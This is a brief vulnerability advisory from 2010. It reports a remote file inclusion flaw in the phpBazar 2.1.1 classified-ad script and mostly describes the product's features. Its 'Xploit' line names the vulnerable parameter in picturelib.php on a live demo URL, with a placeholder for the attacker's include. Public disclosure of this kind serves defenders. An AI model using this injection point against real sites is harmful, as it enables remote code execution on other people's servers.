# Title: phpBazar V2.1.1 stable rfi Vulnerability
# Author: Sid3^effects
# Published: 2010-06-03
# Verison: 2.1.1 stable
# vendor: SmartISoft

Description :

phpBazar is a PHP/MySQL-based higly customizable template-driven classified ad script. Features: Install tool, Multi-languare support, Easy configuration via CSS, User management, Ad pictures stored in MySQL or text file, Ad attachments, Unlimited categories, Structured category display, Picture display, WebMail, Send URL-refer, My ad entries, My ad favorites, Search engine, Ad rating, CatNotify, Expired ads notification, Ad-of-the-Day, Flood protection, Member list/search/details, IP-logging/banning, E-mail and username banning, Dirty and long word filter, Admin ad-approval, Web admin panel, Useronline, and more. Includes guestbook, voting script and Forum & Chat interface. English, German and French languages incl. Also available are picture library, sales, and chat options

The older versions of phpBazar had many vulnerabilities and the latest verion of phpBazar V2.1.1 stable has got rfi bug

Xploit :

demo url:http://www.phpbazar.com/bazar/picturelib.php?cat=[RFI]